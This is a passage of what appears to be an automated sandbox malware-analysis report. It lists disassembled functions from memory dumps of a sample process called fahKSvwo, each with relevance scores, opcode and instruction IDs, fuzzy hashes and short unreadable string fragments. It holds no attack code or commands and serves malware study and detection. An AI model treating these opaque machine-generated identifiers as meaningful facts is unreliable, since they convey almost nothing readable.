                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 189c1c6efc74d9377b81d6a396b950d499e21010fd3d24dcc228167ee2a60b0a
                                                                                                                                                          • Instruction ID: 1d21324a47117d17af684806f046e96d66a7ac1f849999c1c24681feeb34edbc
                                                                                                                                                          • Opcode Fuzzy Hash: 189c1c6efc74d9377b81d6a396b950d499e21010fd3d24dcc228167ee2a60b0a
                                                                                                                                                          • Instruction Fuzzy Hash: EE519374E00208DFDB18DFBAD594A9DBBB2FF89300F24912AE919AB364DB345941CF15
                                                                                                                                                          Function 015976F1 Relevance: 10.5, Strings: 8, Instructions: 475COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000D.00000002.4159649468.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_13_2_1590000_fahKSvwo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: (ofq$(ofq$(ofq$(ofq$(ofq$(ofq$,jq$,jq
                                                                                                                                                          • API String ID: 0-3756152659
                                                                                                                                                          • Opcode ID: 9d1bc7e37403f09e3bbfac9876c036369ee879d1814f9977a05199760da02b67
                                                                                                                                                          • Instruction ID: bb9cb605f9f891b402062215bb68a4056879bd5ff52c583e4f100f237942d849
                                                                                                                                                          • Opcode Fuzzy Hash: 9d1bc7e37403f09e3bbfac9876c036369ee879d1814f9977a05199760da02b67
                                                                                                                                                          • Instruction Fuzzy Hash: DA123730A102499FCF25CF68D884AAEBBF2FF89314F14859AE5559B2A1DB30ED41CF51
                                                                                                                                                          Function 01598490 Relevance: 3.2, Strings: 2, Instructions: 703COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000D.00000002.4159649468.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_13_2_1590000_fahKSvwo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: $fq$$fq
                                                                                                                                                          • API String ID: 0-2537786760
                                                                                                                                                          • Opcode ID: 96146641b9ea9912ec9002fc7c95f5ef6352487c0ac6baa65aa1b09b34020494
                                                                                                                                                          • Instruction ID: 38395d68555674a3c7b0d4d7fab36d00aee26f66706ba1ae302d5547a4c67997
                                                                                                                                                          • Opcode Fuzzy Hash: 96146641b9ea9912ec9002fc7c95f5ef6352487c0ac6baa65aa1b09b34020494
                                                                                                                                                          • Instruction Fuzzy Hash: 19523175A002198FEB549BE8C890B9EBB73FF99300F1080A9D25A6B391CF359D85DF51
                                                                                                                                                          Function 01595F38 Relevance: 2.8, Strings: 2, Instructions: 327COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000D.00000002.4159649468.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_13_2_1590000_fahKSvwo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: Hjq$Hjq
                                                                                                                                                          • API String ID: 0-2395847853
                                                                                                                                                          • Opcode ID: b0c11d470688e5b1d1a070a31ed38416f8d26c42dc94f2887764c06bb9e9ec36
                                                                                                                                                          • Instruction ID: 1714833e41b5557eeba30903e303a7969d94b8342912929825bf5f616071ef81
                                                                                                                                                          • Opcode Fuzzy Hash: b0c11d470688e5b1d1a070a31ed38416f8d26c42dc94f2887764c06bb9e9ec36
                                                                                                                                                          • Instruction Fuzzy Hash: 3DB1CD717042118FDF169F388894A6E7BE2BF89310F15886AE9068F396DB74CC49D792
                                                                                                                                                          Function 01596498 Relevance: 2.7, Strings: 2, Instructions: 232COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000D.00000002.4159649468.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_13_2_1590000_fahKSvwo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: ,jq$,jq
                                                                                                                                                          • API String ID: 0-3554820393
                                                                                                                                                          • Opcode ID: 90bce3e29f70c0da36b681b6499ccd5dd386b6dbb59b8498dc4cc127e9eb81a0
                                                                                                                                                          • Instruction ID: bd81dde00cc76a5b71fdbdd2da5d6b803a8508ffe5bb21dad5ecab6a1efded60
                                                                                                                                                          • Opcode Fuzzy Hash: 90bce3e29f70c0da36b681b6499ccd5dd386b6dbb59b8498dc4cc127e9eb81a0
                                                                                                                                                          • Instruction Fuzzy Hash: 3D817C34A00505CFCF14CF6DC89496EBBF2BF89204B158569D606DF3A5DB35E849CB92
                                                                                                                                                          Function 0159AEBA Relevance: 2.7, Strings: 2, Instructions: 201COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000D.00000002.4159649468.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_13_2_1590000_fahKSvwo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: (ofq$(ofq
                                                                                                                                                          • API String ID: 0-4162465338
                                                                                                                                                          • Opcode ID: da769c2f6b1e800f1d55900cfbe7b79a7c5595e2ded356de32a1023fd21644f4
                                                                                                                                                          • Instruction ID: e2e69b6358153d171094155a616f27141e78eb9f33d4f0991480804b96dc35c4
                                                                                                                                                          • Opcode Fuzzy Hash: da769c2f6b1e800f1d55900cfbe7b79a7c5595e2ded356de32a1023fd21644f4
                                                                                                                                                          • Instruction Fuzzy Hash: C961C271B002058FDB44DF68D894AAEBBF6BFC8310B158569E516DF3A1CB359C42CBA1
                                                                                                                                                          Function 01599D59 Relevance: 2.5, Strings: 2, Instructions: 44COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000D.00000002.4159649468.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_13_2_1590000_fahKSvwo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: 4'fq$4'fq
                                                                                                                                                          • API String ID: 0-751858264
                                                                                                                                                          • Opcode ID: 5fa9e3c6f6f59055f1ebac83203b9263105b398e8173540ed20ebfeed17df931
                                                                                                                                                          • Instruction ID: dfe61a4ae71ec8ae57ab2adc59f8f7b0c699e2aa33d4f4ebc8cf97227cfbee7b
                                                                                                                                                          • Opcode Fuzzy Hash: 5fa9e3c6f6f59055f1ebac83203b9263105b398e8173540ed20ebfeed17df931
                                                                                                                                                          • Instruction Fuzzy Hash: 94F044353002156FDB191AA9989097FBA9FFBC8260B14842DFA0ACB391DE61CC0193A1
                                                                                                                                                          Function 01590C8F Relevance: 1.8, Strings: 1, Instructions: 545COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000D.00000002.4159649468.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_13_2_1590000_fahKSvwo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: LRfq
                                                                                                                                                          • API String ID: 0-2333822924
                                                                                                                                                          • Opcode ID: 364f6d2f2bd1b44abe41144c25cd71bd9d3156253e4f12fa230eab727e632ce2
                                                                                                                                                          • Instruction ID: bd31c997a18c47fa3da07c8d4c84f48b6909206103d044db5a56a6346ba235d4
                                                                                                                                                          • Opcode Fuzzy Hash: 364f6d2f2bd1b44abe41144c25cd71bd9d3156253e4f12fa230eab727e632ce2
                                                                                                                                                          • Instruction Fuzzy Hash: 17520A74E00219CFCB64DF68E988A8DBBB2FB89301F1055A9D819AB354DB342E85DF51
                                                                                                                                                          Function 01590CA0 Relevance: 1.8, Strings: 1, Instructions: 539COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000D.00000002.4159649468.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_13_2_1590000_fahKSvwo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: LRfq
                                                                                                                                                          • API String ID: 0-2333822924
                                                                                                                                                          • Opcode ID: 7eb5f7b24eaff6848cb06f3ca9e60c42954cbf4851486245b2a8f0be8f8869e1
                                                                                                                                                          • Instruction ID: 9b5c56e7249671e795a619a789a93517007c75d8fa2f298baab0eb7d5d53b4cb
                                                                                                                                                          • Opcode Fuzzy Hash: 7eb5f7b24eaff6848cb06f3ca9e60c42954cbf4851486245b2a8f0be8f8869e1
                                                                                                                                                          • Instruction Fuzzy Hash: DA520A74E00219CFCB64DF68F988A8DBBB2FB89301F105599D819AB354DB342E85DF51
                                                                                                                                                          Function 0159E007 Relevance: .7, Instructions: 654COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000D.00000002.4159649468.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_13_2_1590000_fahKSvwo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: d508af48ede33a5a7a90f28331114f0144904a4593b9b73c84c67c194b9c007f
                                                                                                                                                          • Instruction ID: 70c9a9580e538206c157f3f120ab600435d70d3ea5cfd7363443f3a734e304b5
                                                                                                                                                          • Opcode Fuzzy Hash: d508af48ede33a5a7a90f28331114f0144904a4593b9b73c84c67c194b9c007f
                                                                                                                                                          • Instruction Fuzzy Hash: BD129B340216468FD2A42F34F9FE1AEBB65FB0F31371AAC05F02B99159EB74144DAB61
                                                                                                                                                          Function 0159E018 Relevance: .6, Instructions: 647COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000D.00000002.4159649468.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_13_2_1590000_fahKSvwo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: eca13b4ffe34a9e9fb91a8a6555e6a9342cfcc97efa33b4533b4871229a35d94
                                                                                                                                                          • Instruction ID: 358e3df7b6d585fd8b47141c3401a0bd8346879c48599aab2992f38880dc6be5
                                                                                                                                                          • Opcode Fuzzy Hash: eca13b4ffe34a9e9fb91a8a6555e6a9342cfcc97efa33b4533b4871229a35d94
                                                                                                                                                          • Instruction Fuzzy Hash: 38128A340216468F92A42F34F9FE1AEBB65FB0F31370ABC05F02B99159EB74144DAB61
                                                                                                                                                          Function 015980D8 Relevance: .2, Instructions: 201COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000D.00000002.4159649468.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_13_2_1590000_fahKSvwo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 95e71daaa32a2d44094ca1a183a391db213fbcc655e135159ee86aa5f2b185ac
                                                                                                                                                          • Instruction ID: 7188165ff1d68536fe95bed33925ce0f07a3f4a9063967fc876151da3d861c17
                                                                                                                                                          • Opcode Fuzzy Hash: 95e71daaa32a2d44094ca1a183a391db213fbcc655e135159ee86aa5f2b185ac
                                                                                                                                                          • Instruction Fuzzy Hash: 9B71E6347006098FDF25DF6CC884A6E7BE6BF8A241B1944A9E916DF361DB70DC41CB52
                                                                                                                                                          Function 0159F3F1 Relevance: .2, Instructions: 150COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000D.00000002.4159649468.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_13_2_1590000_fahKSvwo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 22d048279d2896671e98c28d32d5038177dd4b9150f16d65803406b510344a79
                                                                                                                                                          • Instruction ID: 66ce1ee6cf901ceea59ad40a593bc6997e2e443cc61e38d6dfe992554a5e66ac
                                                                                                                                                          • Opcode Fuzzy Hash: 22d048279d2896671e98c28d32d5038177dd4b9150f16d65803406b510344a79
                                                                                                                                                          • Instruction Fuzzy Hash: 8C61F174D01319CFDB14DFE8D994AAEBBB2FF89300F20852AD805AB294DB395985CF40
                                                                                                                                                          Function 0159D548 Relevance: .1, Instructions: 140COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000D.00000002.4159649468.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_13_2_1590000_fahKSvwo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 4a4a38918fb1f13bbc0e4c2ae9c86bbb336b878452b62595d051b83b1646060c
                                                                                                                                                          • Instruction ID: a97716af92b7957fa8b8ef9c14c4c200110f1335858a17cb3aa6ecfa6bd331b3
                                                                                                                                                          • Opcode Fuzzy Hash: 4a4a38918fb1f13bbc0e4c2ae9c86bbb336b878452b62595d051b83b1646060c
                                                                                                                                                          • Instruction Fuzzy Hash: E5519075E01218DFDB58DFA9D584A9DBBF2FF89300F208169E819AB364DB35A805CF10
                                                                                                                                                          Function 015941A0 Relevance: .1, Instructions: 134COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000D.00000002.4159649468.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_13_2_1590000_fahKSvwo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: d775e65acd2f7d90a90a5503983047986544d4c03786716c1b73a0ccb6d16aef
                                                                                                                                                          • Instruction ID: 469a32731e6d19dac52f4eb32712397a93da6f027258c0b5993b128fd30d49b7
                                                                                                                                                          • Opcode Fuzzy Hash: d775e65acd2f7d90a90a5503983047986544d4c03786716c1b73a0ccb6d16aef
                                                                                                                                                          • Instruction Fuzzy Hash: 5D519374E01208DFCB08DFA9D58489DBBF2FF89301B209169E819AB364DB35AD46CF51
                                                                                                                                                          Function 0159A303 Relevance: .1, Instructions: 124COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000D.00000002.4159649468.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_13_2_1590000_fahKSvwo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: ba422b718a3262d34699edcb58ed7cc9c8126ee43bf97287b945c692a643d68a
                                                                                                                                                          • Instruction ID: f2de88e4e5ba3ef7b21c90e90402b4ad4330ef73fb45792e748bd1a96e1500a5
                                                                                                                                                          • Opcode Fuzzy Hash: ba422b718a3262d34699edcb58ed7cc9c8126ee43bf97287b945c692a643d68a
                                                                                                                                                          • Instruction Fuzzy Hash: AB41B431A04249DFCF12CFA8C844A9DBFB2FF85310F048555E9599F262D374D914CB62
                                                                                                                                                          Function 01599C30 Relevance: .1, Instructions: 107COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000D.00000002.4159649468.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_13_2_1590000_fahKSvwo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 1bd6ae42375ca7e663594a958045e8a26397a69b1092a1175dc014ca6cec1730
                                                                                                                                                          • Instruction ID: 666233740ae002caaa4f58e2b87627e1e9428cf02245a79b8c62c607585b744b
                                                                                                                                                          • Opcode Fuzzy Hash: 1bd6ae42375ca7e663594a958045e8a26397a69b1092a1175dc014ca6cec1730
                                                                                                                                                          • Instruction Fuzzy Hash: 7A416B306043458FDB11CF68C884B6E7BE6FB89318F54886AE918CF256D775DC45CBA2
                                                                                                                                                          Function 01595658 Relevance: .1, Instructions: 101COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000D.00000002.4159649468.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_13_2_1590000_fahKSvwo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 58828864293afae3e1efbe1267f97024964a214f80dc168922fee5affa88ab62
                                                                                                                                                          • Instruction ID: 12bac42b9354dca19324990857c1f93fa678a3f0267491caeda9de07ce9c80ff
                                                                                                                                                          • Opcode Fuzzy Hash: 58828864293afae3e1efbe1267f97024964a214f80dc168922fee5affa88ab62
                                                                                                                                                          • Instruction Fuzzy Hash: 7831D63170010ADFCF429F68E888AAE3BA6FB88340F004425F9158F294DB79DD75DBA1
                                                                                                                                                          Function 01598370 Relevance: .1, Instructions: 92COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000D.00000002.4159649468.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_13_2_1590000_fahKSvwo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 7e3cd2e03e6c4c630a8f45fcad9a7c36f128f562d98e64dc05c4b983974db6b2
                                                                                                                                                          • Instruction ID: 83120652972b780302c09d08ad63966de54a0f224925033b06e553d3f88b53dc
                                                                                                                                                          • Opcode Fuzzy Hash: 7e3cd2e03e6c4c630a8f45fcad9a7c36f128f562d98e64dc05c4b983974db6b2
                                                                                                                                                          • Instruction Fuzzy Hash: 3821E0313042494FDF265B398494A3E37E6BFC660C718402ED90ACF3AAEE25C806E742
                                                                                                                                                          Function 01598380 Relevance: .1, Instructions: 87COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000D.00000002.4159649468.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_13_2_1590000_fahKSvwo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 19f45208f3ee21e915caa60cbee8f10ea47c1884b76470737ec2c2188833de8d
                                                                                                                                                          • Instruction ID: d8a8eb54e41e52e431e5614cac554b688187b530a194b7ebff73dc9972e56ca6
                                                                                                                                                          • Opcode Fuzzy Hash: 19f45208f3ee21e915caa60cbee8f10ea47c1884b76470737ec2c2188833de8d
                                                                                                                                                          • Instruction Fuzzy Hash: 54217F303002194BDF255A39849477E26DABFC675CF18843DD50ACF7A9EE65C846A382
                                                                                                                                                          Function 015928F0 Relevance: .1, Instructions: 77COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000D.00000002.4159649468.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_13_2_1590000_fahKSvwo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 4d72573fc5dd3126c35f28b7be8d32a614274e40ab80b4c26e9df9ad181fd68a
                                                                                                                                                          • Instruction ID: 35b1b49857cfda38353e84d1a627ae0a505306e180583f90f880cda7805503e1
                                                                                                                                                          • Opcode Fuzzy Hash: 4d72573fc5dd3126c35f28b7be8d32a614274e40ab80b4c26e9df9ad181fd68a
                                                                                                                                                          • Instruction Fuzzy Hash: B2219035A00115AFCF15DB28D940AAE77A5EB9D3A0F50C459DC0A9B354DB34EA82CBE1
                                                                                                                                                          Function 0153D006 Relevance: .1, Instructions: 76COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000D.00000002.4159070556.000000000153D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0153D000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_13_2_153d000_fahKSvwo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 45097e4ad9196519a5c74fe1d0ffbd606542654af9ee19ded7b75cf7d85ab386
                                                                                                                                                          • Instruction ID: d0ccf008a60fca7eadb0a3190d9ca0707fdf9338460882d4699a7e112604bec3
                                                                                                                                                          • Opcode Fuzzy Hash: 45097e4ad9196519a5c74fe1d0ffbd606542654af9ee19ded7b75cf7d85ab386
                                                                                                                                                          • Instruction Fuzzy Hash: 49314B7110D7C09FD703CB64C994715BF75AF47214F2985DBD8888F2A3C23A980ACB62
                                                                                                                                                          Function 01596300 Relevance: .1, Instructions: 74COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000D.00000002.4159649468.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_13_2_1590000_fahKSvwo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: c5aab0a6ba7ce72f5bf26ba2106e1c0541e4a70f42ada08cdd0d499defe92f55
                                                                                                                                                          • Instruction ID: 29dadaa6d8c0baa9089d4d023382adf5d050460edbc492df64bf6e0a8330604c
                                                                                                                                                          • Opcode Fuzzy Hash: c5aab0a6ba7ce72f5bf26ba2106e1c0541e4a70f42ada08cdd0d499defe92f55
                                                                                                                                                          • Instruction Fuzzy Hash: C72102357006228FCB259A29D49892EB7A6FFC97517194479E916CF398CF70DC0A8B81
                                                                                                                                                          Function 0153D044 Relevance: .1, Instructions: 72COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000D.00000002.4159070556.000000000153D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0153D000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_13_2_153d000_fahKSvwo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 45a46fbbb49afbe37846eebc04ab387045b8971838d0f40ccb86643ba656ba86
                                                                                                                                                          • Instruction ID: 66ae54d495ced0c9cf8d4bbabf4f2a76e1fc1cf36ae65110ea6ca9ee317135cc
                                                                                                                                                          • Opcode Fuzzy Hash: 45a46fbbb49afbe37846eebc04ab387045b8971838d0f40ccb86643ba656ba86
                                                                                                                                                          • Instruction Fuzzy Hash: 0A2100B1504204AFCB15CF68C9C0B26FBB5FBC4754F60C96DE9494F252D73AD446CA61
                                                                                                                                                          Function 01595649 Relevance: .1, Instructions: 69COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000D.00000002.4159649468.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_13_2_1590000_fahKSvwo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 3d3d0004909224437dd7b5378618a44c218bb80048231cb4f83a8bc4a79db3ad
                                                                                                                                                          • Instruction ID: 23f5f211e09c8743bfbc8d716c30a75c2c6d833de4b9d02ebd4696f682307bac
                                                                                                                                                          • Opcode Fuzzy Hash: 3d3d0004909224437dd7b5378618a44c218bb80048231cb4f83a8bc4a79db3ad
                                                                                                                                                          • Instruction Fuzzy Hash: 84212631B051099FCF029F68E4886AE3BA5FB99340F00446AE9058F345D778DE69CBE1
                                                                                                                                                          Function 0159AEF0 Relevance: .1, Instructions: 69COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000D.00000002.4159649468.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_13_2_1590000_fahKSvwo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 8887e1a46c65b402146364e55950b2d3bbe6872fb93e7eab6873af9a216e3507
                                                                                                                                                          • Instruction ID: 74f4d8ae831c3c7af3a5e192bafb3539035447b4d671e84a1b6547c3741cb7ef
                                                                                                                                                          • Opcode Fuzzy Hash: 8887e1a46c65b402146364e55950b2d3bbe6872fb93e7eab6873af9a216e3507
                                                                                                                                                          • Instruction Fuzzy Hash: 94216276A002049FDF15CF54D884BEDBBB5FB88350F159029E925AB390DB719C15DBA0
                                                                                                                                                          Function 0159F312 Relevance: .1, Instructions: 67COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000D.00000002.4159649468.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_13_2_1590000_fahKSvwo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: c043bba3dc6a7eedfc5a8bf9f39a4a4ed00947d78e03e2f5c328bc52dd4feb42
                                                                                                                                                          • Instruction ID: 106ced6aafc24f32d239b37aa900eac949aff75ebfb8227e6ab40ff20c4d6b24
                                                                                                                                                          • Opcode Fuzzy Hash: c043bba3dc6a7eedfc5a8bf9f39a4a4ed00947d78e03e2f5c328bc52dd4feb42
                                                                                                                                                          • Instruction Fuzzy Hash: 40216DB1E00209DFCB44DFA8D58069EBFF1FB46304F1095AAD414AB264EB385E45DB91
                                                                                                                                                          Function 01599761 Relevance: .1, Instructions: 65COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
